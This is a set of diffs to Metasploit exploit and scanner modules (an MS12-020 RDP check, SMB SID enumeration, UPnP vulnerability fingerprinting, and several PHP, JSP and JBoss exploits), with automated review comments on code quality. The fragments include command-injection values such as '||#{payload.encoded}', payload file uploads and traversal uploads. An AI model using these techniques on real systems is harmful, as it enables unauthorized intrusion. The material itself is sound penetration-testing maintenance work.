"\x02\x01\x00" + # minThroughput
"\x02\x01\x01" + # maxHeight
"\x02\x02\xff\xff" + # maxMCSPDUSize
"\x02\x01\x02" + # protocolVersion
"\x30\x18" + # minParams + size
"\x02\x01\x01" + # maxChannelIds
"\x02\x01\x01" + # maxUserIds
"\x02\x01\x01" + # maxTokenIds
"\x02\x01\x01" + # numPriorities
"\x02\x01\x00" + # minThroughput
"\x02\x01\x01" + # maxHeight
"\x02\x01\xff" + # maxMCSPDUSize
"\x02\x01\x02" + # protocolVersion
"\x30\x19" + # maxParams + size
"\x02\x01\xff" + # maxChannelIds
"\x02\x01\xff" + # maxUserIds
"\x02\x01\xff" + # maxTokenIds
"\x02\x01\x01" + # numPriorities
"\x02\x01\x00" + # minThroughput
"\x02\x01\x01" + # maxHeight
"\x02\x02\xff\xff" + # maxMCSPDUSize
"\x02\x01\x02" + # protocolVersion
"\x04\x00" # userData
end
def user_request
"\x03\x00" + # header
"\x00\x08" + # length
"\x02\xf0\x80" + # X.224 Data TPDU (2 bytes: 0xf0 = Data TPDU, 0x80 = EOT, end of transmission)
"\x28" # PER encoded PDU contents
end
def channel_request_one
"\x03\x00\x00\x0c" +
"\x02\xf0\x80\x38" +
"\x00\x01\x03\xeb"
end
def channel_request_two
"\x03\x00\x00\x0c" +
"\x02\xf0\x80\x38" +
"\x00\x02\x03\xeb"
end
def peer
"#{rhost}:#{rport}"
end
def run_host(ip)
connect
# check if rdp is open
if not check_rdp
disconnect
return
end
# send connectInitial
sock.put(connect_initial)
# send userRequest
sock.put(user_request)
res = sock.get_once(-1, 5)
# send 2nd userRequest
sock.put(user_request)
res = sock.get_once(-1, 5)
# send channel request one
sock.put(channel_request_one)
res = sock.get_once(-1, 5)
if res and res[8,2] == "\x3e\x00"
# send ChannelRequestTwo - prevent BSoD
sock.put(channel_request_two)
print_good("#{peer} Vulnerable to MS12-020")
report_goods
else
vprint_status("#{peer} Not Vulnerable")
end
disconnect()
end
end
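Review bot: The `channel_request_two` that the comment in run_host says prevents a BSoD is only sent when `res[8,2] == "\x3e\x00"`; if `sock.get_once` times out or the socket drops after `channel_request_one` on a vulnerable host, the module disconnects without it, which undercuts the description's claim that the check "does not cause a DoS on the target". Send the second channel request unconditionally before `disconnect`, or wrap the exchange so it always goes out, `begin … ensure (sock.put(channel_request_two) rescue nil); disconnect; end`. Separately, `OptInt.new('RPORT', [ true, 'Remote port running RDP', '3389' ])` gives the default as a String where the integer `3389` (or `Opt::RPORT(3389)`) is expected, and the `res = sock.get_once(-1, 5)` results after the two user requests are overwritten without being examined, so a non-RDP talker is only caught by the final comparison.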


@ -24,12 +24,21 @@ class Metasploit3 < Msf::Auxiliary
def initialize
super(
'Name' => 'SMB Local User Enumeration (LookupSid)',
'Description' => 'Determine what local users exist via brute force SID lookups',
'Description' => 'Determine what users exist via brute force SID lookups.
This module can enumerate both local and domain accounts by setting
ACTION to either LOCAL or DOMAIN',
'Author' => 'hdm',
'License' => MSF_LICENSE,
'DefaultOptions' => {
'DefaultOptions' =>
{
'DCERPC::fake_bind_multi' => false
}
},
'Actions' =>
[
['LOCAL', { 'Description' => 'Enumerate local accounts' } ],
['DOMAIN', { 'Description' => 'Enumerate domain accounts' } ]
],
'DefaultAction' => 'LOCAL'
)
register_options(
@ -206,6 +215,8 @@ class Metasploit3 < Msf::Auxiliary
:groups => {}
}
target_sid = host_sid if action.name =~ /LOCAL/i
target_sid = domain_sid if action.name =~ /DOMAIN/i
# Brute force through a common RID range
500.upto(datastore['MaxRID'].to_i) do |rid|
@ -216,7 +227,7 @@ class Metasploit3 < Msf::Auxiliary
NDR.long(1) +
NDR.long(rand(0x10000000)) +
NDR.long(5) +
smb_pack_sid(host_sid) +
smb_pack_sid(target_sid) +
NDR.long(rid) +
NDR.long(0) +
NDR.long(0) +
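Review bot: `target_sid = domain_sid if action.name =~ /DOMAIN/i` is used unguarded in `smb_pack_sid(target_sid)`, so when the host is not domain-joined or the domain SID lookup (outside the hunk) fails and `domain_sid` is nil, the RID loop packs a nil SID instead of reporting a clear error; add `if target_sid.nil? then print_error("#{ip} - no #{action.name} SID available"); return; end` before the loop. Matching the action by regex also means any future action whose name contains LOCAL or DOMAIN falls through to the last assignment; `case action.name when 'LOCAL' then target_sid = host_sid when 'DOMAIN' then target_sid = domain_sid end` is more precise.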


@ -16,7 +16,7 @@ class Metasploit3 < Msf::Auxiliary
super(
'Name' => 'UPnP SSDP M-SEARCH Information Discovery',
'Description' => 'Discover information from UPnP-enabled systems',
'Author' => 'todb',
'Author' => [ 'todb', 'hdm'], # Original scanner module and vuln info reporter, respectively
'License' => MSF_LICENSE
)
@ -26,6 +26,10 @@ class Metasploit3 < Msf::Auxiliary
], self.class)
end
def rport
datastore['RPORT']
end
def setup
super
@msearch_probe =
@ -34,7 +38,7 @@ class Metasploit3 < Msf::Auxiliary
"ST:upnp:rootdevice\r\n" +
"Man:\"ssdp:discover\"\r\n" +
"MX:3\r\n" +
"\r\n\r\n" # Non-standard, but helps
"\r\n"
end
def scanner_prescan(batch)
@ -43,10 +47,13 @@ class Metasploit3 < Msf::Auxiliary
end
def scan_host(ip)
vprint_status "#{ip}:#{rport} - SSDP - sending M-SEARCH probe"
scanner_send(@msearch_probe, ip, datastore['RPORT'])
end
def scanner_postscan(batch)
print_status "No SSDP endpoints found." if @results.empty?
@results.each_pair do |skey,res|
sinfo = res[:service]
next unless sinfo
@ -60,9 +67,57 @@ class Metasploit3 < Msf::Auxiliary
desc = bits.join(" | ")
sinfo[:info] = desc
res[:vulns] = []
if res[:info][:server].to_s =~ /MiniUPnPd\/1\.0([\.\,\-\~\s]|$)/mi
res[:vulns] << {
:name => "MiniUPnPd ProcessSSDPRequest() Out of Bounds Memory Access Denial of Service",
:refs => [ 'CVE-2013-0229' ]
}
end
if res[:info][:server].to_s =~ /MiniUPnPd\/1\.[0-3]([\.\,\-\~\s]|$)/mi
res[:vulns] << {
:name => "MiniUPnPd ExecuteSoapAction memcpy() Remote Code Execution",
:refs => [ 'CVE-2013-0230' ],
:port => res[:info][:ssdp_port] || 80,
:proto => 'tcp'
}
end
if res[:info][:server].to_s =~ /Intel SDK for UPnP devices.*|Portable SDK for UPnP devices(\/?\s*$|\/1\.([0-5]\..*|8\.0.*|(6\.[0-9]|6\.1[0-7])([\.\,\-\~\s]|$)))/mi
res[:vulns] << {
:name => "Portable SDK for UPnP Devices unique_service_name() Remote Code Execution",
:refs => [ 'CVE-2012-5958', 'CVE-2012-5959' ]
}
end
if res[:vulns].length > 0
vrefs = []
res[:vulns].each do |v|
v[:refs].each do |r|
vrefs << r
end
end
print_good("#{skey} SSDP #{desc} | vulns:#{res[:vulns].count} (#{vrefs.join(", ")})")
else
print_status("#{skey} SSDP #{desc}")
end
report_service( sinfo )
res[:vulns].each do |v|
report_vuln(
:host => sinfo[:host],
:port => v[:port] || sinfo[:port],
:proto => v[:proto] || 'udp',
:name => v[:name],
:info => res[:info][:server],
:refs => v[:refs]
)
end
if res[:info][:ssdp_host]
report_service(
:host => res[:info][:ssdp_host],
@ -89,14 +144,14 @@ class Metasploit3 < Msf::Auxiliary
}
}
if data =~ /^Server:[\s]*(.*)/i
if data =~ /^Server:[\s]*(.*)/mi
@results[skey][:info][:server] = $1.strip
end
ssdp_host = nil
ssdp_port = 80
location_string = ''
if data =~ /^Location:[\s]*(.*)/i
if data =~ /^Location:[\s]*(.*)/mi
location_string = $1
@results[skey][:info][:location] = $1.strip
if location_string[/(https?):\x2f\x2f([^\x5c\x2f]+)/]
@ -113,7 +168,7 @@ class Metasploit3 < Msf::Auxiliary
end
end
if data =~ /^USN:[\s]*(.*)/i
if data =~ /^USN:[\s]*(.*)/mi
@results[skey][:info][:usn] = $1.strip
end
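Review bot: The switch from `/i` to `/mi` on the Server, Location and USN headers in the last hunk changes what `.` matches, not what `^` anchors to: in Ruby `^` is always line-anchored and the `m` flag makes `.` match newlines, so `(.*)` now runs greedily to the end of the response and `@results[skey][:info][:server]` becomes the Server value followed by every remaining header line. The MiniUPnPd and Portable SDK checks still fire because `\s` is in their terminator class, but the stored service info, the `:info` written by report_vuln and the Location parsing are polluted, and `$1.strip` only trims the ends. Revert to `/i`, or capture with `(.*?)\r?$` so the match ends at the line break.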


@ -61,6 +61,7 @@ class Metasploit3 < Msf::Exploit::Remote
def check
uri = normalize_uri(target_uri.path)
uri << '/' if uri[-1,1] != '/'
res = send_request_raw({
'method' => 'GET',
'uri' => uri
@ -114,7 +115,7 @@ class Metasploit3 < Msf::Exploit::Remote
end
def exploit
@uri = normalize_uri(target_uri)
@uri = target_uri
@uri.path << "/" if @uri.path[-1, 1] != "/"
peer = "#{rhost}:#{rport}"
@ -140,7 +141,7 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("#{peer} - Sending malicious request...")
res = send_request_cgi({
'method' => 'POST',
'uri' => @uri.path + "admin/tools/export.php",
'uri' => normalize_uri(@uri.path, "admin/tools/export.php"),
'cookie' => sid,
'vars_post' => {
'token' => token,


@ -69,7 +69,7 @@ class Metasploit3 < Msf::Exploit::Remote
end
def exploit
uri = normalize_uri(target_uri.path)
uri = target_uri.path
uri << '/' if uri[-1,1] != '/'
peer = "#{rhost}:#{rport}"
@ -80,7 +80,7 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("#{peer} - Sending Command injection")
res = send_request_cgi({
'method' => 'POST',
'uri' => "#{uri}spywall/ipchange.php",
'uri' => normalize_uri(uri, 'spywall/ipchange.php'),
'data' => post_data
})


@ -80,7 +80,7 @@ class Metasploit3 < Msf::Exploit::Remote
end
def exploit
uri = normalize_uri(target_uri.path)
uri = target_uri.path
uri << '/' if uri[-1,1] != '/'
peer = "#{rhost}:#{rport}"
@ -97,7 +97,7 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("#{peer} - Sending PHP payload (#{payload_name})")
res = send_request_cgi({
'method' => 'POST',
'uri' => "#{uri}spywall/blocked_file.php",
'uri' => normalize_uri(uri, "spywall/blocked_file.php"),
'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
'data' => post_data.to_s
})


@ -63,6 +63,7 @@ class Metasploit3 < Msf::Exploit::Remote
def check
uri = normalize_uri(target_uri.path)
uri << '/' if uri[-1,1] != '/'
res = send_request_raw({
'uri' => uri,
'method' => 'GET'
@ -78,7 +79,7 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit
peer = "#{rhost}:#{rport}"
base = normalize_uri(target_uri.path)
base = target_uri.path
base << '/' if base[-1,1] != '/'
@payload_name = "#{rand_text_alpha(5)}.php"
@ -93,7 +94,7 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("#{peer} Uploading payload: #{@payload_name}")
res = send_request_cgi({
'uri' => "#{base}includes/inline_image_upload.php",
'uri' => normalize_uri(base, 'includes/inline_image_upload.php'),
'method' => 'POST',
'ctype' => 'multipart/form-data; boundary=----x',
'data' => post_data


@ -73,8 +73,7 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit
peer = "#{rhost}:#{rport}"
uri = normalize_uri(target_uri.path)
uri << '/' if uri[-1, 1] != '/'
uri = target_uri.path
print_status("#{peer} - Housing php payload...")
@ -86,7 +85,7 @@ class Metasploit3 < Msf::Exploit::Remote
post_data << "\n"*2
send_request_cgi({
'method' => 'POST',
'uri' => "#{uri}install/index.php",
'uri' => normalize_uri(uri, 'install/index.php'),
'data' => post_data
})
@ -95,7 +94,7 @@ class Metasploit3 < Msf::Exploit::Remote
# Execute our payload
send_request_raw({
'method' => 'GET',
'uri' => "#{uri}includes/settings.php",
'uri' => normalize_uri(uri, 'includes/settings.php'),
'headers' => {
'Cmd' => Rex::Text.encode_base64(payload.encoded)
}


@ -55,12 +55,12 @@ class Metasploit3 < Msf::Exploit::Remote
end
def check
uri = normalize_uri(target_uri.path)
uri = target_uri.path
uri << '/' if uri[-1,1] != '/'
res = send_request_cgi({
'method' => 'GET',
'uri' => uri + "docs/changes.txt"
'uri' => normalize_uri(uri, "docs/changes.txt")
})
if res and res.code == 200 and res.body =~ /1\.0\.2 \- 17\/01\/11/
@ -122,7 +122,7 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit
uri = normalize_uri(target_uri.path)
uri = target_uri.path
uri << '/' if uri[-1,1] != '/'
peer = "#{rhost}:#{rport}"
@ -131,7 +131,7 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("#{peer} - Injecting the PHP payload")
response = send_request_cgi({
'uri' => uri + "converter.php",
'uri' => normalize_uri(uri, "converter.php"),
'method' => "POST",
'vars_post' => {
"action" => "convert",
@ -149,7 +149,7 @@ class Metasploit3 < Msf::Exploit::Remote
timeout = 0.01
response = send_request_cgi({
'uri' => uri + "includes/currencies.php",
'uri' => normalize_uri(uri, "includes/currencies.php"),
'method' => "GET",
'headers' => {
'Connection' => "close",


@ -32,7 +32,7 @@ class Metasploit3 < Msf::Exploit::Remote
'BadChars' => '',
'DisableNops' => true,
},
'Platform' => [ 'win', 'linux', 'solaris', 'unix', 'osx', 'bsd', 'php', 'java' ],
'Platform' => [ 'win', 'linux', 'solaris', 'unix', 'osx', 'bsd', 'php', 'java','ruby','js','python' ],
'Arch' => ARCH_ALL,
'Targets' => [ [ 'Wildcard Target', { } ] ],
'DefaultTarget' => 0


@ -57,13 +57,13 @@ class Metasploit3 < Msf::Exploit::Remote
end
def check
uri = normalize_uri(target_uri.path)
uri = target_uri.path
uri << '/' if uri[-1,1] != '/'
clue = Rex::Text::rand_text_alpha(rand(5) + 5)
res = send_request_cgi({
'method' => 'GET',
'uri' => "#{uri}plugins/access.ssh/checkInstall.php",
'uri' => normalize_uri(uri, 'plugins/access.ssh/checkInstall.php'),
'vars_get' => {
'destServer' => "||echo #{clue}"
}
@ -79,13 +79,12 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit
peer = "#{rhost}:#{rport}"
uri = normalize_uri(target_uri.path)
uri << '/' if target_uri.path[-1,1] != '/'
uri = target_uri.path
# Trigger the command execution bug
res = send_request_cgi({
'method' => 'GET',
'uri' => "#{uri}plugins/access.ssh/checkInstall.php",
'uri' => normalize_uri(uri, "plugins/access.ssh/checkInstall.php"),
'vars_get' =>
{
'destServer' => "||#{payload.encoded}"


@ -59,12 +59,12 @@ class Metasploit3 < Msf::Exploit::Remote
end
def check
uri = normalize_uri(target_uri.path)
uri = target_uri.path
uri << '/' if uri[-1,1] != '/'
res = send_request_cgi({
'method' => 'GET',
'uri' => "#{uri}addons/uploadify/uploadify.php"
'uri' => normalize_uri(uri, 'addons/uploadify/uploadify.php')
})
if res and res.code == 200 and res.body.empty?
@ -75,8 +75,7 @@ class Metasploit3 < Msf::Exploit::Remote
end
def exploit
uri = normalize_uri(target_uri.path)
uri << '/' if uri[-1,1] != '/'
uri = target_uri.path
peer = "#{rhost}:#{rport}"
payload_name = Rex::Text.rand_text_alpha(rand(10) + 5) + '.php'
@ -91,7 +90,7 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("#{peer} - Sending PHP payload (#{payload_name})")
res = send_request_cgi({
'method' => 'POST',
'uri' => "#{uri}addons/uploadify/uploadify.php",
'uri' => normalize_uri(uri, "addons/uploadify/uploadify.php"),
'ctype' => 'multipart/form-data; boundary=o0oOo0o',
'data' => post_data
})
@ -107,7 +106,7 @@ class Metasploit3 < Msf::Exploit::Remote
# Execute our payload
res = send_request_cgi({
'method' => 'GET',
'uri' => "#{uri}addons/uploadify/uploads/#{payload_name}"
'uri' => normalize_uri(uri, "addons/uploadify/uploads/#{payload_name}")
})
# If we don't get a 200 when we request our malicious payload, we suspect


@ -56,11 +56,12 @@ class Metasploit3 < Msf::Exploit::Remote
def check
uri = normalize_uri(target_uri.path)
uri << '/' if uri[-1,1] != '/'
uri = target_uri.path
base = File.dirname("#{uri}.")
res = send_request_raw({'uri'=>"#{base}/admin/sitebanners/upload_banners.php"})
res = send_request_raw({
'uri' => normalize_uri("#{base}/admin/sitebanners/upload_banners.php")
})
if res and res.body =~ /\<title\>Pet Rate Admin \- Banner Manager\<\/title\>/
return Exploit::CheckCode::Appears
else
@ -83,7 +84,7 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("#{@peer} - Uploading payload (#{p.length.to_s} bytes)...")
res = send_request_cgi({
'method' => 'POST',
'uri' => "#{base}/admin/sitebanners/upload_banners.php",
'uri' => normalize_uri("#{base}/admin/sitebanners/upload_banners.php"),
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => post_data,
})
@ -94,7 +95,7 @@ class Metasploit3 < Msf::Exploit::Remote
end
print_status("#{@peer} - Requesting '#{php_fname}'...")
res = send_request_raw({'uri'=>"#{base}/banners/#{php_fname}"})
res = send_request_raw({'uri'=>normalize_uri("#{base}/banners/#{php_fname}")})
if res and res.code == 404
print_error("#{@peer} - Upload unsuccessful: #{res.code.to_s}")
return
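Review bot: Removing `uri << '/' if uri[-1,1] != '/'` from check breaks `base = File.dirname("#{uri}.")` for a TARGETURI without a trailing slash: `/petrate` becomes `/petrate.` and dirname yields `/`, so the check and the later requests hit the document root instead of the application. Either restore the trailing-slash line before computing base, or drop the dirname trick and build paths with `normalize_uri(target_uri.path, 'admin/sitebanners/upload_banners.php')` as the rest of this commit does. The `base` used in the exploit hunks is computed outside the visible hunk and may share the same problem.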


@ -267,7 +267,7 @@ class Metasploit3 < Msf::Exploit::Remote
res = send_request_cgi(
{
'method' => 'POST',
'uri' => "#{rpath}/axis2-admin/login",
'uri' => normalize_uri(rpath, '/axis2-admin/login'),
'ctype' => 'application/x-www-form-urlencoded',
'data' => "userName=#{user}&password=#{pass}&submit=+Login+",
}, 25)
@ -303,7 +303,7 @@ class Metasploit3 < Msf::Exploit::Remote
res = send_request_cgi(
{
'method' => 'POST',
'uri' => "#{rpath}/axis2-admin/login",
'uri' => normalize_uri(rpath, '/axis2-admin/login'),
'ctype' => 'application/x-www-form-urlencoded',
'data' => "userName=#{user}&password=#{pass}&submit=+Login+",
}, 25)
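Review bot: `'data' => "userName=#{user}&password=#{pass}&submit=+Login+"` in both hunks builds the form body by interpolation, so a credential containing `&`, `=`, `%` or `+` is sent corrupted and the login silently fails on exactly the passwords a brute force tends to try. Hand the fields to `'vars_post' => { 'userName' => user, 'password' => pass, 'submit' => ' Login ' }` and drop the explicit `'ctype'`, which send_request_cgi sets and encodes for you. The login helper's definition starts outside the hunk.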


@ -62,7 +62,7 @@ class Metasploit3 < Msf::Exploit::Remote
base << '/' if base[-1, 1] != '/'
res = send_request_raw({
'method' => 'GET',
'uri' => "#{base}"
'uri' => base
})
if res.body =~ /\<strong style\=\"font\-size\:8pt\;font\-weight\:normal\"\>Version 2\.11\.2\<\/strong\>\<br\>/
@ -90,7 +90,7 @@ class Metasploit3 < Msf::Exploit::Remote
# upload
res = send_request_cgi({
'method' => 'POST',
'uri' => "#{base}pages/restart_circulation_values_write.php",
'uri' => normalize_uri(base, "pages/restart_circulation_values_write.php"),
'ctype' => "multipart/form-data; boundary=#{boundary}",
'data' => data_post,
})
@ -117,7 +117,7 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("#{@peer} - Retrieving file: #{fname}")
send_request_raw({
'method' => 'GET',
'uri' => "#{base}upload/___1/#{fname}"
'uri' => normalize_uri(base, "upload/___1/#{fname}")
})
handler


@ -59,14 +59,14 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit
# Make sure the URI begins with a slash
uri = normalize_uri(datastore['URI'])
uri = datastore['URI']
function = "passthru"
key = Rex::Text.rand_text_alpha(6)
arguments = "echo #{key}`"+payload.raw+"`#{key}"
res = send_request_cgi({
'uri' => uri + "/services/javascript.php",
'uri' => normalize_uri(uri, "/services/javascript.php"),
'method' => 'POST',
'ctype' => 'application/x-www-form-urlencoded',
'data' => "app="+datastore['APP']+"&file=open_calendar.js",
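Review bot: The comment `# Make sure the URI begins with a slash` is now stale, since `uri = datastore['URI']` no longer normalizes anything and the slash is added by the `normalize_uri(uri, "/services/javascript.php")` call below; either move the comment next to that call or drop the local and write `'uri' => normalize_uri(datastore['URI'], "/services/javascript.php")`. The body `"app="+datastore['APP']+"&file=open_calendar.js"` is also concatenated by hand, so an APP value containing `&` or `=` is not encoded; `'vars_post' => { 'app' => datastore['APP'], 'file' => 'open_calendar.js' }` would handle that. `exploit` continues past the hunk.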


@ -101,7 +101,7 @@ class Metasploit3 < Msf::Exploit::Remote
# Generate an initial JSESSIONID
print_status("#{@peer} - Retrieving an initial JSESSIONID")
res = send_request_cgi(
'uri' => "#{@uri}servlet/Main",
'uri' => normalize_uri(@uri, 'servlet/Main'),
'method' => 'POST'
)
@ -118,7 +118,7 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("#{@peer} - Authenticating on HP SiteScope Configuration")
res = send_request_cgi(
{
'uri' => "#{@uri}j_security_check",
'uri' => normalize_uri(@uri, 'j_security_check'),
'method' => 'POST',
'data' => login_data,
'ctype' => "application/x-www-form-urlencoded",
@ -264,7 +264,7 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("#{@peer} - Uploading the JSP")
res = send_request_cgi(
{
'uri' => "#{@uri}upload?REMOTE_HANDLER_KEY=UploadFilesHandler&UploadFilesHandler.file.name=#{traversal}#{@jsp_name}.jsp&UploadFilesHandler.ovveride=true",
'uri' => normalize_uri(@uri, 'upload') + "?REMOTE_HANDLER_KEY=UploadFilesHandler&UploadFilesHandler.file.name=#{traversal}#{@jsp_name}.jsp&UploadFilesHandler.ovveride=true",
'method' => 'POST',
'data' => post_data.to_s,
'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
@ -285,7 +285,7 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("Triggering payload at '#{@uri}#{@jsp_name}.jsp' ...")
send_request_cgi(
{
'uri' => "#{@uri}#{@jsp_name}.jsp",
'uri' => normalize_uri(@uri, "#{@jsp_name}.jsp"),
'method' => 'GET',
'headers' =>
{
@ -334,7 +334,7 @@ class Metasploit3 < Msf::Exploit::Remote
data << "</wsns0:Envelope>" + "\r\n"
res = send_request_cgi({
'uri' => "#{@uri}services/APIPreferenceImpl",
'uri' => normalize_uri(@uri, 'services/APIPreferenceImpl'),
'method' => 'POST',
'ctype' => 'text/xml; charset=UTF-8',
'data' => data,
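Review bot: The status line `print_status("Triggering payload at '#{@uri}#{@jsp_name}.jsp' ...")` still prints the raw concatenation while the request right below it now goes to `normalize_uri(@uri, "#{@jsp_name}.jsp")`, so the logged path can differ from the one actually requested (missing or doubled slash). Compute it once, `jsp_uri = normalize_uri(@uri, "#{@jsp_name}.jsp")`, and use `jsp_uri` in both the message and the `'uri'` key. The enclosing methods start and end outside the hunks.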


@ -391,7 +391,7 @@ EOT
end
def query_serverinfo
path = normalize_uri(datastore['PATH']) + '/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo'
path = normalize_uri(datastore['PATH'], '/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo')
res = send_request_raw(
{
'uri' => path,
@ -449,13 +449,13 @@ EOT
if (datastore['VERB']== "POST")
res = send_request_cgi({
'method' => datastore['VERB'],
'uri' => normalize_uri(datastore['PATH']) + '/HtmlAdaptor',
'uri' => normalize_uri(datastore['PATH'], '/HtmlAdaptor'),
'data' => params
})
else
res = send_request_cgi({
'method' => datastore['VERB'],
'uri' => normalize_uri(datastore['PATH']) + '/HtmlAdaptor?' + params
'uri' => normalize_uri(datastore['PATH'], '/HtmlAdaptor') + "?#{params}"
}, 30)
end
res
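Review bot: In `query_serverinfo` the whole query string is passed through `normalize_uri(datastore['PATH'], '/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo')`, whereas the second hunk of this file (and the sibling JBoss modules in this commit) keep it outside: `normalize_uri(datastore['PATH'], '/HtmlAdaptor') + '?action=inspectMBean&name=jboss.system:type=ServerInfo'`. If normalize_uri collapses repeated slashes or otherwise rewrites its input, a query value would be altered, so path normalization should only see the path. `query_serverinfo` continues beyond the first hunk.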


@ -277,14 +277,14 @@ EOT
if (datastore['VERB'] == "POST")
res = send_request_cgi(
{
'uri' => normalize_uri(datastore['PATH']) + '/HtmlAdaptor',
'uri' => normalize_uri(datastore['PATH'], '/HtmlAdaptor'),
'method' => datastore['VERB'],
'data' => data
}, 5)
else
res = send_request_cgi(
{
'uri' => normalize_uri(datastore['PATH']) + '/HtmlAdaptor?' + data,
'uri' => normalize_uri(datastore['PATH'], '/HtmlAdaptor') + "?#{data}",
'method' => datastore['VERB'],
}, 30)
end
@ -308,14 +308,14 @@ EOT
if (datastore['VERB'] == "POST")
res = send_request_cgi(
{
'uri' => normalize_uri(datastore['PATH']) + '/HtmlAdaptor',
'uri' => normalize_uri(datastore['PATH'], '/HtmlAdaptor'),
'method' => datastore['VERB'],
'data' => data
}, 5)
else
res = send_request_cgi(
{
'uri' => normalize_uri(datastore['PATH']) + '/HtmlAdaptor;index.jsp?' + data,
'uri' => normalize_uri(datastore['PATH'], '/HtmlAdaptor;index.jsp') + "?#{data}",
'method' => datastore['VERB'],
}, 30)
end
@ -378,7 +378,7 @@ EOT
def query_serverinfo
path = normalize_uri(datastore['PATH']) + '/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo'
path = normalize_uri(datastore['PATH'], '/HtmlAdaptor') + '?action=inspectMBean&name=jboss.system:type=ServerInfo'
res = send_request_raw(
{
'uri' => path,
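Review bot: The first two hunks (lines 277 and 308) contain the same GET/POST dispatch, differing only in the adaptor path (`'/HtmlAdaptor'` versus `'/HtmlAdaptor;index.jsp'`) and with the same shape repeated in the sibling JBoss modules of this commit. A small helper taking the path and the query/body would remove the duplication and keep the normalize_uri split in one place. The enclosing methods begin and end outside the hunks, so the helper below is written from the visible lines only.
```ruby
# Issues one HtmlAdaptor request: body for POST, query string otherwise (per VERB).
def send_html_adaptor(adaptor_path, data)
  if datastore['VERB'] == "POST"
    send_request_cgi({
      'uri' => normalize_uri(datastore['PATH'], adaptor_path),
      'method' => datastore['VERB'],
      'data' => data
    }, 5)
  else
    send_request_cgi({
      'uri' => normalize_uri(datastore['PATH'], adaptor_path) + "?#{data}",
      'method' => datastore['VERB'],
    }, 30)
  end
end
# … unchanged: callers become res = send_html_adaptor('/HtmlAdaptor', data) …
```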


@ -176,7 +176,7 @@ class Metasploit3 < Msf::Exploit::Remote
if (datastore['VERB'] == "POST")
res = send_request_cgi({
'method' => datastore['VERB'],
'uri' => normalize_uri(datastore['PATH']) + '/HtmlAdaptor',
'uri' => normalize_uri(datastore['PATH'], '/HtmlAdaptor'),
'vars_post' =>
{
'action' => 'invokeOpByName',
@ -189,7 +189,7 @@ class Metasploit3 < Msf::Exploit::Remote
else
res = send_request_cgi({
'method' => datastore['VERB'],
'uri' => normalize_uri(datastore['PATH']) + '/HtmlAdaptor',
'uri' => normalize_uri(datastore['PATH'], '/HtmlAdaptor'),
'vars_get' =>
{
'action' => 'invokeOpByName',
@ -275,7 +275,7 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("Undeploying #{app_base} ...")
res = send_request_cgi({
'method' => datastore['VERB'],
'uri' => normalize_uri(datastore['PATH']) + '/HtmlAdaptor',
'uri' => normalize_uri(datastore['PATH'], '/HtmlAdaptor'),
'vars_post' =>
{
'action' => 'invokeOpByName',
@ -314,7 +314,7 @@ class Metasploit3 < Msf::Exploit::Remote
def query_serverinfo
path = normalize_uri(datastore['PATH']) + '/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo'
path = normalize_uri(datastore['PATH'], '/HtmlAdaptor') + '?action=inspectMBean&name=jboss.system:type=ServerInfo'
res = send_request_raw(
{
'uri' => path


@ -73,7 +73,7 @@ class Metasploit3 < Msf::Exploit::Remote
def http_send_command(cmd, opts = {})
request_parameters = {
'method' => 'POST',
'uri' => "#{@uri.path}script",
'uri' => normalize_uri(@uri.path, "script"),
'vars_post' =>
{
'script' => java_craft_runtime_exec(cmd),
@ -150,7 +150,7 @@ class Metasploit3 < Msf::Exploit::Remote
print_status('Logging in...')
res = send_request_cgi({
'method' => 'POST',
'uri' => "#{@uri.path}j_acegi_security_check",
'uri' => normalize_uri(@uri.path, "j_acegi_security_check"),
'vars_post' =>
{
'j_username' => Rex::Text.uri_encode(datastore['USERNAME'], 'hex-normal'),
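Review bot: The `'vars_post'` value in the login request is pre-encoded with `Rex::Text.uri_encode(datastore['USERNAME'], 'hex-normal')` even though other modules in this commit pass raw values through `vars_post` (e.g. `'savepage' => php_fname`), which suggests the client already form-encodes them; if so, a username with reserved characters is double-encoded and `'j_username' => datastore['USERNAME']` is what is wanted. Please confirm against the HttpClient mixin before changing it. Both `http_send_command` and the login method continue beyond the hunks.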


@ -66,7 +66,7 @@ class Metasploit3 < Msf::Exploit::Remote
res = send_request_raw({
'method' => 'GET',
'uri' => "#{uri}admin/libraries/ajaxfilemanager/ajax_create_folder.php"
'uri' => normalize_uri(uri, "admin/libraries/ajaxfilemanager/ajax_create_folder.php")
})
if res and res.code == 200
@ -87,14 +87,14 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("#{peer} - Sending PHP payload (#{php.length.to_s} bytes)")
send_request_cgi({
'method' => 'POST',
'uri' => "#{uri}admin/libraries/ajaxfilemanager/ajax_create_folder.php",
'uri' => normalize_uri(uri, "admin/libraries/ajaxfilemanager/ajax_create_folder.php"),
'data' => php
})
print_status("#{peer} - Requesting data.php")
send_request_raw({
'method' => 'GET',
'uri' => "#{uri}admin/libraries/ajaxfilemanager/inc/data.php"
'uri' => normalize_uri(uri, 'admin/libraries/ajaxfilemanager/inc/data.php')
})
handler
